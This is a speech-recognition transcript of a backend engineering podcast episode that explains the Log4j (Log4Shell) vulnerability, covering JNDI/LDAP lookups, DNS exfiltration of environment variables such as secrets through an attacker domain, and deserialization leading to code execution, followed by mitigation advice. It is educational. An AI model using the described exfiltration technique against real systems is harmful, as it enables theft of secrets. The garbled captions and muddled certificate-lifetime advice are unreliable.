The Log4j vulnerability | The Backend Engineering Show

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

in this episode of the backend engineering show i'd like to talk about the log 4j vulnerability the remote code execution so we'll we'll discuss what is lock4j we'll discuss how exactly this vulnerability actually works and how dangerous it is yeah we throw words like remote code execution for every vulnerability but but how the question is the how here and finally i'll talk about how really just adding features on your software or your back and really you need to think twice about every feature you add and what is the ramification of such feature how about we jump into it welcome to the back engineering show with your host jose nasser and yes we are back baby we are back i'm back in town here and uh i know i'm a little late to the game talking about look 4j because there are like thousands and thousands of articles and videos already about the topic but uh doesn't hurt because i'm really fascinated about this bug slash vulnerability and it's so funny because look 4j was literally been there for 20 20 years i first heard about look for jail was maybe 12 000 six two thousand i don't know why that sounds japanese or 2 000.6 so this thing 2006 that's the first time i heard about that and there was a consultant that came to our work and uh i was i was writing a software and i wrote my own logging facility yeah playing some some sort of a plugin that logs everything that have that happens on my application and he said no don't do that don't don't roll on your own stuff use this thing that's called log4j and it's it has a lot of features it i was like thinking really we need a software to log how hard is it to log right just write it to a disk right well the more you think about it is just you need to search the logs you need to you know organize the logs like you need to you need you need to specify what are you logging where are you logging it right like do you want it to write log in a database do you want to log in on system and then if this is a file system what if you have multiple logs multiple applications running multiple servers how do you aggregate those logs and if it becomes complicated the more you think about it right most users if you're like your own thing if you're doing your own thing you don't really need it but if you're building an enterprise system or big software you need some sort of a advanced logging solution and log4j was the you know the de facto one for anything logging really so so yeah log4j very popular yet this wasn't as mainstream as it happened like two weeks ago whatever when we heard about it literally everybody's talking about look for jada so what happened so i look forward when you when you build a back end like let's take a web server and web app that is running on the back end and you want to log like failed attempts right or uh users who want to log in and like failed or someone tried to ddos you and you want to log these incidents or some sort of errors and you want to log them you basically use log4j to log these facilities are you on the back end let's say i want to log every failed attempt right to login and i don't want to look the password that is used but i'm going to unlock the username so hey this username tried to log in from this ip address right so how how does how how would you do that you the listener or if you're watching this on youtube or listening to the podcast how would you actually do it right well i need to know the email that tries to log in or the account id that's easy because that's just another parameter in the post request right how would you know for example where this guy is coming from or which browser they used well there is a nice header called user agent right you can read that user agent and then read the body which has the account id and then say hey this account id blah the variable name try to log in from blah use that agent you know just normal programming stuff and you write it so you blindly take what the user sent and then you send it to log4j and says hey log this so log4j sees this as just another string but this string has been sent by the user and here is where the attack surface happens this is a very common thing that's very similar to sql injection really you really need to sanitize the input before sending it all right so this is what we'll look for jso this is what it's doing and then this is how basically the attack can start so in specific version of log4j they introduced i believe a log for j 2.0 and the beta version right they introduced the ability to kind of enrich the logging experience you know yeah these guys have started to log in right but they have the account id but you want to log more information right in the log and you won't log for j to do it for you here's the id but go and look up what the name of the account is for example and also print it so yeah i would say hey account id blog take the same thing that the user submit and then you say okay between pattern faces this is the account name and how do you get the account name because the user didn't send it to you well you can lock it up right look 4j can look up the account id and there are so many look up mechanisms and extensions in look 4g this was introduced with an interface in java called jndi the java naming and directory interface so it's an interface that you can use to look up multiple things so there was a jndi plugin or a component to look up ldap information you know the x the lightweight directory protocol access protocol right which is the implementation in windows called active directory right off the ldap where you can look up certain information profile about the user itself like the full name stuff like that right and you can print it or or just print it in the log right so there's a specific uri that you can craft and this is a legit thing you can do it in in look 4j right so you the programmer can add that on the back end and then say okay so at the end of the day say okay account id 17 tries to log in parentheses who's saying nozzle that's the account name right so you know and instead so if you're new when you query the logs you can see actually more information in written information so that was that was a feature that was added seems nice right but here's what happened what if that crafted url was actually right sent by the user right so instead of me writing the actual account id as a failed attempt i'll write this specially crafted url right i'll put in the screen right now it's jdi whatever slash ldap blah blah blah then you put obviously the the server name where the ldap directory exists right right and then you specify some sort of an object to retrieve there so yeah so that's how you do a lookup so the specially crafted url will have jndi and then we'll have the actual protocol which is ldap and then we'll have a url right the actual domain name right where the ldap lives the server and then slash some sort of an object like what what do you want to retrieve there okay and look 4j will query that uh first of all it will resolve dns if that has a dns and then so the back end is a result looking at a dns so keep that in mind the backend look for j is resolving the dns to an iep address so it's sending a dns request to get that the ip address and then establish a tcp connection on a specific port whatever that part is and then we'll then send the specific command of the protocol the ldap protocol and then start communicating with the server sounds okay until the user actually start sending this specially crafted uri from the interface itself well how the user can just type in instead of the account id or the email they just type in the special craft say okay jndi blah blah blah and then the attacker website right the under the attacker domain which has the ldap directory and then slash the object right and then you send it if you as a developer took that account id as is and you say hey just log that forget about anything right log4j will look at this oh that's a lookup let me do a lookup it will blindly take a lookup right it will blindly take that string resolve the dns because it's that now it's the attacker upside right result that yes get the ipad establish a tcp connection to the attacker server so far so far it's it's dangerous right but there is no remote code execution yet let's think about it let's just be very clear about this so log4j you're back in just connected to a malicious server that is dangerous because the attack if the attacker has control of the dns the resolution of the dns right itself is dangerous why just just take that alone so if we've seen such attacks like this before where using domain name resolution as a vehicle to transmit information from the victim's machine we've seen this with apple i think someone i'll link up the video i don't remember but someone managed to craft some sort of a code that eventually run on one of apple's machines internal machines like the engineering i think department and then from there yeah it was an npm package i think i think it was an npm package right and then usually you know every apple have all sorts of firewalls but nobody really controlled dns so far gns are usually you know benign but what he did is like he took the machine name of the actual user that is running uh the victim the machine name and then hashed it in a way he created a base64 not a hash this secret to base64 and added it as a as a sub domain to his domain right so it will take blah blah blah engineering machine one apple dot so and then when the npm or the machine tries to resolve the dns it will basically hey ask the dns servers like ask the the main director hey resolve this dns for me blah blah blah blah dot attacker.com so to it it's just another domain that we need dns that we need to basically resolve so we'll just basically go through the dns protocol you know says okay who owns uh blah blah blah.attacker.com oh this is the top level domain it's dot com then attacker.com who owns attacker.com it's the attacker's dns server so the attacker just got a beautiful string that has the subdomain which has the string which is basically the uh useful information about the victim dot attacker.com so they will throw the docker.com but they take this precious subdomain of course they're not going to resolve the ip because there is no ip as well maybe they'll just resolve it to some random ip address right or just they will resolve always resolve it to the same ipos of the attacker because they have full control over the dns it's software guys it's just software so now back to the four lock 4g just forget about ldap and all the lockup you just right allowed your back end to resolve dns that the user specified which can be an attacker so what's what's wrong with that here's what you can do environment variables have you guys heard about it if i as an attacker right back to the failed login attempt right go to the account id and then name yourself for example dollar sign path dot attacker dot com and then put it in this ldap thing right crafted a string and then send it so the login will fail obviously and as a result you want to log that activity so you'll take the account id which happens to be jndi slash latch ldap blah blah and then dollar sign path.attacker.com and then send it over and you just take that string and then log it look 4j will says wait a minute that's actually a lookup let me actually try to retrieve the ldap version of the the lookup value of this string that we just sent right because we're pulling some information here well oh what's this uh dollar signpath.attacker.com oh i don't know this is a dns i need to resolve it but before that the assignment path is actually an environment variable on the back end so it says look for joe say oh you want to oh you want me to just paste the path directory the environment variable and this oh let me do that job for you so the backend log 4g will take the path all the beautiful paths that you have one environment variable at least right and then write it right to this entry right dot attacker.com so this beautiful sub domain right you might get some errors because of like some and invalid characters or so like so attackers can do all sorts of things to you know base64 to what now right and then resolve that and when you resolve it that beautiful string will end up in the dns uh controlled attacker domain scary stuff just again this is a way to leak information from the back into the attacker now just do that dollar sign jwt token dollar signed jwt secret any possible enviro variable you can just send it along right so we still don't have a remote code execution this is just leaking information out right with just dns resolution right if that is even before we establish a tcp connection to the attacker's website after the fact that you got the ipads scary stuff man scary stuff let's take a sip of coffee so how does this remote could execute because what we read online is that oh remote code execution remote code execution so it's like someone's like installing stuff on the back and someone's i i read that someone has actually installed will manage to install a bitcoin miner i think it was a coin mine i don't know if it's bitcoin miner it's just one of those miners right and they managed to install it on the back end and that mines the stuff or the attacker nice at ease but how from what we read here is just okay that let's read through this all right even if the lookup that happens here in the string managed to uh [Music] go to the attackers website and retrieve some sort of a payload that is malicious even let's say it's code right you retrieve code and you then one log4j will just print the code right will log it that doesn't execute code right if you if you if you just i don't know if it's java code even if it's java code just down download that java code and it will be just printed so the log will have the code but it will not be executed so i was like how does it actually execute look for just shouldn't execute just code because it's code needs to be compiled and stuff like that so i did a lot of research and i finally found a video by sans institute they did a good job at explaining how exactly this works and it's another thing that is fascinating it comes back to something i also used back in the day the the days of soap right which is called a serializing an object and desegregating objects so if you have a vb.net or c-sharp actual object that is you're running on your code right a class that you institute an object out of it that object is just in memory right right java this works the same way you have an object that is instantiated this object has properties methods functions you know has code in it right constructor all that stuff you can convert that object and store all its state right with all its state the properties and the values you can convert that into a string you can serialize that right just like we do in serializing json for example you serialize that into just a string a beautiful string right and when you take that string right you can send that string across the network and on the other end you can deserialize that string back to an object on another end that's very similar to how soap works right when you start to send objects you serialize the object and then you de-series on the other end and you just now transferred the object to another server that is the key here to the ldap jndi uh remote code execution so the attacker here what he does right they craft the ldap object you know the ldap url such that it retrieves some sort of a string but this string is a special string right when you retrieve when when the log 4g retrieves that special string it will detect that is actually not just a string it's a serialized object and here's the problem look for jay will try to be smart and says wait a second this is a serialized object let me deserialize that object back to a beautiful object so it will take that benign string that's the problem that was that was the question that i had how is this just a normal code or just a string end up in memory executing that's luck 4g what's doing was it there some people wanted to dehydrate this object some people who wanted to deserialize these things so they they will deserialize that and they put it in memory and when you deserialize it i'm pretty sure the constructor is being called again i'm pretty sure or a method will be called and you as an attacker could have control of all this method and when when the d serializer calls this method put your code there and it's the end of the word you can just now you now you just force look 4j to execute code that you have put right so what happens here they will become a deserialized object that has methods it will have uh properties and it will have functions that functions have code and this code can do anything you want literally anything mine delete stuff if you have permission level log forward you have permission it will have basically full rain you can do anything scary stuff guys very very scary stuff but the moment i read about this uh vulnerabilities the first thing that came to mind was like why is the back end even connected to the internet right because remember back ends shouldn't have no business connected to the internet it should be isolated right deep down you know your infrastructure and just just isolate it the only thing that is connected to it is basically the api gateway reverse proxy or load balancer and that is basically even that shouldn't be connected to the internet to be honest there will be there will be another interface network interface which then connects to that other clients which can connect to that right right eve but but that but that's not always you know possible you know back ends need unfortunately to connect to the internet you might say i'm saying why well we've made a lot of videos about this stuff right you know back-ends or need to be secured with tls certificates right and those tls certificates you know with the problem with tls certificates or this is not this is not unfortunately this is not written in stone you know nothing is perfect in the world of engineering that's what i found i started to find as the more i dive deep the more i i realized that whatever we're doing is is not it's not perfect you know when you start learning things now this is just another advice i i know i'm going all over the place all right you when you start learning back in general or engineering in general you it's like a mountain that you have oh how do i learn all this stuff and becomes overwhelming and you become like an obligation to learn how things is done but the moment you get deep into things you know that all this stuff is built by human and human make mistakes and everything here have flaws and we've seen this here we take this like an in a pedestrian in a way that these things these guys don't make mistakes like everybody makes mistakes whatever you when you come to a domain right you don't know anything about always doubt everything why is things doing why is this done this way oh the moment someone says oh it's always been done this way because that's the best practice or that's the only best way something fishy is going on that you're questioning your doubts are always in the right place when you doubt something that means something is it's probably something uh legit you know and just a keep doubting that's what um so i say all right so back the certificate thing so the certificates you know the way of authenticating servers right unfortunately we didn't find a solution to this yet right it's like if i have a certificate how do i know that this certificate is valid well you might say you're saying it has an expiration date right right but it has an expiration date right which which is baked into the certificate but there's another problem certificates ha are you know or hashed or what's the right word for this are encrypted with the private key of the server right it's assigned that's the right one signed by the private key and if that private key is leaked we've seen many incidents where the private key was leaked right then this certificate is useless because whoever had this private key can recreate that certificate and prove to be themselves basically you know impersonate impersonate the server bad so they invented this thing that's called the long story short online certificate status protocol i want to know if this certificate yeah i know it's not expired but i want to know if it's revoked is this still valid is this thing legit can i use it can i trust it so long story short i made a whole video about certificates check this video out but the fact to tell the client that this certificate is not revoked require a call to a revocation server right an online certificate status protocol an online certificate status protocol server that lives on the internet so the back end end up calling the internet to staple this certificate with a certificate another certificate that says hey yeah i know it's not expired but also it's not revoked yet it's good you can you can fully trust it so that if you have ocsp stapling then your inter your back and should connect to the internet right now even with that you should really just uh allow certain domains right you should never have full rent on the back end to connect to any domain just specific domains like okay i'm gonna allow the ocsp stapling uh server i'm gonna allow whatever uh this back-end and this back-end i might need to connect to this particular api gateway for amazon i mean with the internet unfortunately everything on the cloud if you have a lot of you know uh you're connected to a lot of services you find yourself needing to enable internet on the back end try to minimize that as much as possible to have secure because 99 of the time if you don't have like internet on the back end then yeah the the back end look 4j will never phone the attack at home and you will never have this problem through dns you really need to also stop dns and i'm not sure how you do that like right how do you stop dns resolutions it's just i guess you can you can have your own dns resolution name server and then only allow certain name resolutions but that would be difficult so i suggest that you um i'm going to link the video in the description the sans institute they go into more way more details on about this right but effectively they also have another attack they go up also about the remediation like wow what do you do to protect this i update to this particular version of log4j if you are using it right and then all sorts of things right so yeah they also explain an attack surface where you can even even if you don't have an internet action even if you don't have an internet access on your back end uh they also find a way to you know exploit that right which i'm not i'm not sure how to be honest maybe the client sends a actual serialized object that just gets executed immediately maybe i don't know but yeah that's basically the look for j attack very dangerous stuff teaches you that they're adding features especially in a very popular software that is maintained by an open source volunteers you know it's just uh just fascinating how how the entire world is depending on an open source project and you see it because now there is a problem with the software now everybody's screaming apple relies on it minecraft relies on it amazon relies on it most the software relies on on logging facility because that nobody's going to write their own logging right if you want they're going to use an open source one and this one has been there for 20 years 21 years maybe more so it's legit but when things go wrong boy you know the war just sets on flame yeah there's a lot of a lot there are a lot of incidents where people actually using this um this attack right specifically in scanning and you might say how do you scan how do you scan something like that right when you scan you basically scanning is is not hard because think about it like what do you what you try to guess what would the back end log right the back end is always interested in logging where things are coming from right so you would send that special crafted string which has the gndi and the ldap and the domain name of the attacker right send it in the headers send it in you know the origin right send in any information that might you know benefit the back end of logging you it's again it becomes a guess game at the end of the day right so i'm gonna guess and then just wait on your server to receive a dns query or if you don't control the dns doesn't matter receive wait for a tcp connection right because at the end of the day the back end will establish a tcp connection to your server and just for that i mean you can you can do so much of that as well like if someone is connecting to you right yeah it has a special protocol but you can you can control that protocol you can you can play with that right but yeah fascinating stuff you can you can find out where the connection are coming from so the server name you can find the ipls of the backend scary stuff indeed the scary stuff and this stuff in this so this is how scanning is being happening so now the attackers who are scanning the internet are just logging the ip addresses of the infected back ends not infected effectively but the the possible vulnerable back end that have log 4g the moment you get a tcpa connection and we've seen many videos and twitter polls that people are actually doing that for tests minecraft just send that to the chat and if the chat is you know minecraft will log certain chats if it's like malicious or something like that and the moment they start to log in look 4g will kick in and do the lookup so remediation what do you do disable internet on the back end if you can right try to kill that thing right you might worry about ocsp stabling don't do that instead get a 14 a week certificate from cloudflare right get a short as the shortest the certificate the better because if you have a short certificate then that your private key is recycled right on on a on a bi-weekly basis that's the shortest thing i've seen like 14 weeks which is amazing right and then the next one is uh three months which is let's encrypt um and then yeah you can you can get a year but i think that now the browser consulting forces uh all the certificate to be at least one year i believe anything that beloved is just not secure anymore uh attackers are finding ways around cryptographic uh you know cracking curtail stuff or not uh guys uh i'm gonna end this video i know i've been all over the place but it's been a while since i recorded a video so uh i know i talked a lot but it's just uh i had a lot to talk about i guess so so excuse me for this if this uh episode was a little bit unstructured but i guess some people like that some people don't like that but it is what it is and i'll try to be more organized and structured in the in the next episode i'm going to talk about the amazon outage next hopefully if i have time but uh i'm going to see you in the next one you guys stay awesome this thank you so much goodbye

Info

Channel: Hussein Nasser

Views: 9,167

Rating: undefined out of 5

Keywords: hussein nasser, backend engineering, log4j

Id: 77XnEaWNups

Channel Id: undefined

Length: 34min 53sec (2093 seconds)

Published: Tue Dec 14 2021